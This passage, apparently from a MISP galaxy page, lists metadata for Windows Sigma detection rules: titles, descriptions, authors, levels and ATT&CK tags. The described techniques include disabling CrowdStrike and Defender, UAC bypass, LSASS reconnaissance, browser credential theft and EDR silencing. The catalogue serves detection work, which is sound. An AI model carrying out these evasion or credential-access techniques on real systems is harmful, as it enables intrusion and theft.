author Ivan Dyachkov, Yulia Fomina, oscd.community
creation_date 2020-10-07
falsepositive ['Unknown']
filename proc_creation_win_registry_cimprovider_dll_load.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574']
Related clusters

To see the related clusters, click here.

Windows Kernel Debugger Execution

Detects execution of the Windows Kernel Debugger "kd.exe".

Internal MISP references

UUID 27ee9438-90dc-4bef-904b-d3ef927f5e7e which can be used as unique global reference for Windows Kernel Debugger Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-15
falsepositive ['Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required']
filename proc_creation_win_kd_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation']

Windows Internet Hosted WebDav Share Mount Via Net.EXE

Detects when an internet hosted webdav share is mounted using the "net.exe" utility

Internal MISP references

UUID 7e6237fe-3ddb-438f-9381-9bf9de5af8d0 which can be used as unique global reference for Windows Internet Hosted WebDav Share Mount Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-21
falsepositive ['Unknown']
filename proc_creation_win_net_use_mount_internet_share.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Uninstall Crowdstrike Falcon Sensor

Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon

Internal MISP references

UUID f0f7be61-9cf5-43be-9836-99d6ef448a18 which can be used as unique global reference for Uninstall Crowdstrike Falcon Sensor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-07-12
falsepositive ['Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated']
filename proc_creation_win_uninstall_crowdstrike_falcon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Powershell Defender Disable Scan Feature

Detects requests to disable Microsoft Defender features using PowerShell commands

Internal MISP references

UUID 1ec65a5f-9473-4f12-97da-622044d6df21 which can be used as unique global reference for Powershell Defender Disable Scan Feature in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-03-03
falsepositive ['Possible administrative activity', 'Other Cmdlets that may use the same parameters']
filename proc_creation_win_powershell_defender_disable_feature.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Using ChangePK and SLUI

Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)

Internal MISP references

UUID 503d581c-7df0-4bbe-b9be-5840c0ecc1fc which can be used as unique global reference for UAC Bypass Using ChangePK and SLUI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_changepk_slui.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

UtilityFunctions.ps1 Proxy Dll

Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.

Internal MISP references

UUID 0403d67d-6227-4ea8-8145-4e72db7da120 which can be used as unique global reference for UtilityFunctions.ps1 Proxy Dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-05-28
falsepositive ['Unknown']
filename proc_creation_win_lolbin_utilityfunctions.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Process Creation Using Sysnative Folder

Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)

Internal MISP references

UUID 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab which can be used as unique global reference for Process Creation Using Sysnative Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022-08-23
falsepositive ['Unknown']
filename proc_creation_win_susp_sysnative.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

New Generic Credentials Added Via Cmdkey.EXE

Detects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via command line interface.

Internal MISP references

UUID b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 which can be used as unique global reference for New Generic Credentials Added Via Cmdkey.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-03
falsepositive ['Legitimate usage for administration purposes']
filename proc_creation_win_cmdkey_adding_generic_creds.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.005']
Related clusters

To see the related clusters, click here.

Sysmon Driver Unloaded Via Fltmc.EXE

Detects possible Sysmon filter driver unloaded via fltmc.exe

Internal MISP references

UUID 4d7cda18-1b12-4e52-b45c-d28653210df8 which can be used as unique global reference for Sysmon Driver Unloaded Via Fltmc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, oscd.community
creation_date 2019-10-23
falsepositive ['Unlikely']
filename proc_creation_win_fltmc_unload_driver_sysmon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070', 'attack.t1562', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Suspicious Greedy Compression Using Rar.EXE

Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes

Internal MISP references

UUID afe52666-401e-4a02-b4ff-5d128990b8cb which can be used as unique global reference for Suspicious Greedy Compression Using Rar.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022-12-15
falsepositive ['Unknown']
filename proc_creation_win_rar_susp_greedy_compression.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

PUA - Wsudo Suspicious Execution

Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)

Internal MISP references

UUID bdeeabc9-ff2a-4a51-be59-bb253aac7891 which can be used as unique global reference for PUA - Wsudo Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-12-02
falsepositive ['Unknown']
filename proc_creation_win_pua_wsudo_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.privilege-escalation', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Esentutl Steals Browser Information

One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe

Internal MISP references

UUID 6a69f62d-ce75-4b57-8dce-6351eb55b362 which can be used as unique global reference for Esentutl Steals Browser Information in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-13
falsepositive ['Legitimate use']
filename proc_creation_win_esentutl_webcache.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

PUA - AdvancedRun Execution

Detects the execution of AdvancedRun utility

Internal MISP references

UUID d2b749ee-4225-417e-b20e-a8d2193cbb84 which can be used as unique global reference for PUA - AdvancedRun Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-20
falsepositive ['Unknown']
filename proc_creation_win_pua_advancedrun.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1564.003', 'attack.t1134.002', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Potential DLL Injection Via AccCheckConsole

Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.

Internal MISP references

UUID 0f6da907-5854-4be6-859a-e9958747b0aa which can be used as unique global reference for Potential DLL Injection Via AccCheckConsole in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-06
falsepositive ['Legitimate use of the UI Accessibility Checker']
filename proc_creation_win_acccheckconsole_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'detection.threat-hunting']

LSASS Process Reconnaissance Via Findstr.EXE

Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID

Internal MISP references

UUID fe63010f-8823-4864-a96b-a7b4a0f7b929 which can be used as unique global reference for LSASS Process Reconnaissance Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-08-12
falsepositive ['Unknown']
filename proc_creation_win_findstr_lsass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Suspicious Splwow64 Without Params

Detects suspicious Splwow64.exe process without any command line parameters

Internal MISP references

UUID 1f1a8509-2cbb-44f5-8751-8e1571518ce2 which can be used as unique global reference for Suspicious Splwow64 Without Params in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-08-23
falsepositive ['Unknown']
filename proc_creation_win_splwow64_cli_anomaly.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Potential Arbitrary Command Execution Using Msdt.EXE

Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability

Internal MISP references

UUID 258fc8ce-8352-443a-9120-8a11e4857fa5 which can be used as unique global reference for Potential Arbitrary Command Execution Using Msdt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-05-29
falsepositive ['Unknown']
filename proc_creation_win_msdt_arbitrary_command_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Suspicious Key Manager Access

Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)

Internal MISP references

UUID a4694263-59a8-4608-a3a0-6f8d3a51664c which can be used as unique global reference for Suspicious Key Manager Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-04-21
falsepositive ['Administrative activity']
filename proc_creation_win_rundll32_keymgr.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1555.004']
Related clusters

To see the related clusters, click here.

Suspicious Velociraptor Child Process

Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.

Internal MISP references

UUID 4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c which can be used as unique global reference for Suspicious Velociraptor Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-08-29
falsepositive ['Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts.']
filename proc_creation_win_susp_velociraptor_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.persistence', 'attack.defense-evasion', 'attack.t1219']
Related clusters

To see the related clusters, click here.

HackTool - Rubeus Execution

Detects the execution of the hacktool Rubeus via PE information of command line parameters

Internal MISP references

UUID 7ec2c172-dceb-4c10-92c9-87c1881b7e18 which can be used as unique global reference for HackTool - Rubeus Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018-12-19
falsepositive ['Unlikely']
filename proc_creation_win_hktl_rubeus.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.credential-access', 'attack.t1003', 'attack.t1558.003', 'attack.lateral-movement', 'attack.t1550.003']
Related clusters

To see the related clusters, click here.

Uncommon System Information Discovery Via Wmic.EXE

Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.

Internal MISP references

UUID 9d5a1274-922a-49d0-87f3-8c653483b909 which can be used as unique global reference for Uncommon System Information Discovery Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author TropChaud
creation_date 2023-01-26
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_system_info_uncommon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Diskshadow Script Mode - Uncommon Script Extension Execution

Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.

Internal MISP references

UUID 1dde5376-a648-492e-9e54-4241dd9b0c7f which can be used as unique global reference for Diskshadow Script Mode - Uncommon Script Extension Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-09-15
falsepositive ['False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required.']
filename proc_creation_win_diskshadow_script_mode_susp_ext.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious RDP Redirect Using TSCON

Detects a suspicious RDP session redirect using tscon.exe

Internal MISP references

UUID f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb which can be used as unique global reference for Suspicious RDP Redirect Using TSCON in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018-03-17
falsepositive ['Unknown']
filename proc_creation_win_tscon_rdp_redirect.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1563.002', 'attack.t1021.001', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

Suspicious Redirection to Local Admin Share

Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers

Internal MISP references

UUID ab9e3b40-0c85-4ba1-aede-455d226fd124 which can be used as unique global reference for Suspicious Redirection to Local Admin Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-01-16
falsepositive ['Unknown']
filename proc_creation_win_susp_redirect_local_admin_share.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

Rar Usage with Password and Compression Level

Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.

Internal MISP references

UUID faa48cae-6b25-4f00-a094-08947fef582f which can be used as unique global reference for Rar Usage with Password and Compression Level in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ROxPinTeddy
creation_date 2020-05-12
falsepositive ['Legitimate use of Winrar command line version', 'Other command line tools, that use these flags']
filename proc_creation_win_rar_compression_with_password.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Add Windows Capability Via PowerShell Cmdlet

Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.

Internal MISP references

UUID b36d01a3-ddaf-4804-be18-18a6247adfcd which can be used as unique global reference for Add Windows Capability Via PowerShell Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-22
falsepositive ['Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.']
filename proc_creation_win_powershell_add_windows_capability.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Potential SPN Enumeration Via Setspn.EXE

Detects service principal name (SPN) enumeration used for Kerberoasting

Internal MISP references

UUID 1eeed653-dbc8-4187-ad0c-eeebb20e6599 which can be used as unique global reference for Potential SPN Enumeration Via Setspn.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, keepwatch
creation_date 2018-11-14
falsepositive ['Administration activity']
filename proc_creation_win_setspn_spn_enumeration.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

Suspicious Windows Update Agent Empty Cmdline

Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags

Internal MISP references

UUID 52d097e2-063e-4c9c-8fbb-855c8948d135 which can be used as unique global reference for Suspicious Windows Update Agent Empty Cmdline in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-02-26
falsepositive ['Unknown']
filename proc_creation_win_wuauclt_no_cli_flags_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

New Kernel Driver Via SC.EXE

Detects creation of a new service (kernel driver) with the type "kernel"

Internal MISP references

UUID 431a1fdb-4799-4f3b-91c3-a683b003fc49 which can be used as unique global reference for New Kernel Driver Via SC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-14
falsepositive ['Rare legitimate installation of kernel drivers via sc.exe']
filename proc_creation_win_sc_new_kernel_driver.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Unmount Share Via Net.EXE

Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

Internal MISP references

UUID cb7c4a03-2871-43c0-9bbb-18bbdb079896 which can be used as unique global reference for Unmount Share Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2020-10-08
falsepositive ['Administrators or Power users may remove their shares via cmd line']
filename proc_creation_win_net_share_unmount.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070.005']
Related clusters

To see the related clusters, click here.

Console CodePage Lookup Via CHCP

Detects use of chcp to look up the system locale value as part of host discovery

Internal MISP references

UUID 7090adee-82e2-4269-bd59-80691e7c6338 which can be used as unique global reference for Console CodePage Lookup Via CHCP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author _pete_0, TheDFIRReport
creation_date 2022-02-21
falsepositive ["During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.", 'Discord was seen using chcp to look up code pages']
filename proc_creation_win_chcp_codepage_lookup.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1614.001']
Related clusters

To see the related clusters, click here.

HackTool - EDRSilencer Execution

Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.

Internal MISP references

UUID eb2d07d4-49cb-4523-801a-da002df36602 which can be used as unique global reference for HackTool - EDRSilencer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2024-01-02
falsepositive ['Unlikely']
filename proc_creation_win_hktl_edrsilencer.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location

Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.

Internal MISP references

UUID b2b048b0-7857-4380-b0fb-d3f0ab820b71 which can be used as unique global reference for Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-02-05
falsepositive ['Administrators building packages using iexpress.exe']
filename proc_creation_win_iexpress_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

RDP Connection Allowed Via Netsh.EXE

Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware

Internal MISP references

UUID 01aeb693-138d-49d2-9403-c4f52d7d3d62 which can be used as unique global reference for RDP Connection Allowed Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sander Wiebing
creation_date 2020-05-23
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_fw_allow_rdp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

HTML Help HH.EXE Suspicious Child Process

Detects a suspicious child process of a Microsoft HTML Help (HH.exe)

Internal MISP references

UUID 52cad028-0ff0-4854-8f67-d25dfcbc78b4 which can be used as unique global reference for HTML Help HH.EXE Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020-04-01
falsepositive ['Unknown']
filename proc_creation_win_hh_html_help_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.initial-access', 'attack.t1047', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1059.005', 'attack.t1059.007', 'attack.t1218', 'attack.t1218.001', 'attack.t1218.010', 'attack.t1218.011', 'attack.t1566', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Computer Discovery And Export Via Get-ADComputer Cmdlet

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

Internal MISP references

UUID 435e10e4-992a-4281-96f3-38b11106adde which can be used as unique global reference for Computer Discovery And Export Via Get-ADComputer Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-11-10
falsepositive ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"]
filename proc_creation_win_powershell_computer_discovery_get_adcomputer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033']
Related clusters

To see the related clusters, click here.

Suspicious MSHTA Child Process

Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution

Internal MISP references

UUID 03cc0c25-389f-4bf8-b48d-11878079f1ca which can be used as unique global reference for Suspicious MSHTA Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag
creation_date 2019-01-16
falsepositive ['Printer software / driver installations', 'HP software']
filename proc_creation_win_mshta_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.005', 'car.2013-02-003', 'car.2013-03-001', 'car.2014-04-003']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Via DeviceEnroller.EXE

Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter

Internal MISP references

UUID e173ad47-4388-4012-ae62-bd13f71c18a8 which can be used as unique global reference for Potential DLL Sideloading Via DeviceEnroller.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2022-08-29
falsepositive ['Unknown']
filename proc_creation_win_deviceenroller_dll_sideloading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

Visual Studio Code Tunnel Service Installation

Detects the installation of VsCode tunnel (code-tunnel) as a service.

Internal MISP references

UUID 30bf1789-379d-4fdc-900f-55cd0a90a801 which can be used as unique global reference for Visual Studio Code Tunnel Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-10-25
falsepositive ['Legitimate installation of code-tunnel as a service']
filename proc_creation_win_vscode_tunnel_service_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Renamed PingCastle Binary Execution

Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.

Internal MISP references

UUID 2433a154-bb3d-42e4-86c3-a26bdac91c45 which can be used as unique global reference for Renamed PingCastle Binary Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2024-01-11
falsepositive ['Unknown']
filename proc_creation_win_renamed_pingcastle.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense-evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Fsutil Drive Enumeration

Attackers may leverage fsutil to enumerated connected drives.

Internal MISP references

UUID 63de06b9-a385-40b5-8b32-73f2b9ef84b6 which can be used as unique global reference for Fsutil Drive Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
creation_date 2022-03-29
falsepositive ['Certain software or administrative tasks may trigger false positives.']
filename proc_creation_win_fsutil_drive_enumeration.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1120']
Related clusters

To see the related clusters, click here.

HackTool - Bloodhound/Sharphound Execution

Detects command line parameters used by Bloodhound and Sharphound hack tools

Internal MISP references

UUID f376c8a7-a2d0-4ddc-aa0c-16c17236d962 which can be used as unique global reference for HackTool - Bloodhound/Sharphound Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-12-20
falsepositive ["Other programs that use these command line option and accepts an 'All' parameter"]
filename proc_creation_win_hktl_bloodhound_sharphound.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.001', 'attack.t1069.002', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PUA - Seatbelt Execution

Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters

Internal MISP references

UUID 38646daa-e78f-4ace-9de0-55547b2d30da which can be used as unique global reference for PUA - Seatbelt Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-18
falsepositive ['Unlikely']
filename proc_creation_win_pua_seatbelt.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1526', 'attack.t1087', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Screen Capture Activity Via Psr.EXE

Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.

Internal MISP references

UUID 2158f96f-43c2-43cb-952a-ab4580f32382 which can be used as unique global reference for Screen Capture Activity Via Psr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community
creation_date 2019-10-12
falsepositive ['Unknown']
filename proc_creation_win_psr_capture_screenshots.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

System Network Connections Discovery Via Net.EXE

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

Internal MISP references

UUID 1c67a717-32ba-409b-a45d-0fb704a73a81 which can be used as unique global reference for System Network Connections Discovery Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-10
falsepositive ['Unknown']
filename proc_creation_win_net_use_network_connections_discovery.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1049']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 57bff678-25d1-4d6c-8211-8ca106d12053 which can be used as unique global reference for Remote Access Tool - ScreenConnect Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-13
falsepositive ['Legitimate usage of the tool']
filename proc_creation_win_remote_access_tools_screenconnect.yml
level medium
logsource.category process_creation
logsource.product windows
